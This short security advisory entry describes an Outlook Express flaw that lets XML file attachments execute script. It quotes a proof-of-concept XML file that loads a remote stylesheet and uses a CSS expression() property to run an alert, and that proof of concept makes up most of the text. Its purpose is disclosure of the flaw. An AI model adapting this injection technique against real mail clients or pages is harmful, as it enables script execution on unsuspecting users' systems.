|
Microsoft Outlook Express XML File Attachment Script Execution Vulnerability
"http-equiv@excite.com" <http-equiv@malware.com> has provided the following XML document, which will act as a proof of concept exploit: <?xml version="1.0" ?> <?xml-stylesheet type="text/css" href="http://www.malware.com/malware.css" ?> <malware> <h4 style="position: absolute;top:39;left:expression(alert (document.location));font-family:arial;font-size:12pt;BACKGROUND- IMAGE:url('http://www.malware.com/youlickit.gif');background- repeat:no-repeat;background-position: 100 30;z-index:- 100;height:200pt;width:400pt;font-family:Verdana;color:red">sure it can, malware says so</h4> </malware> |
|
 Privacy Statement |
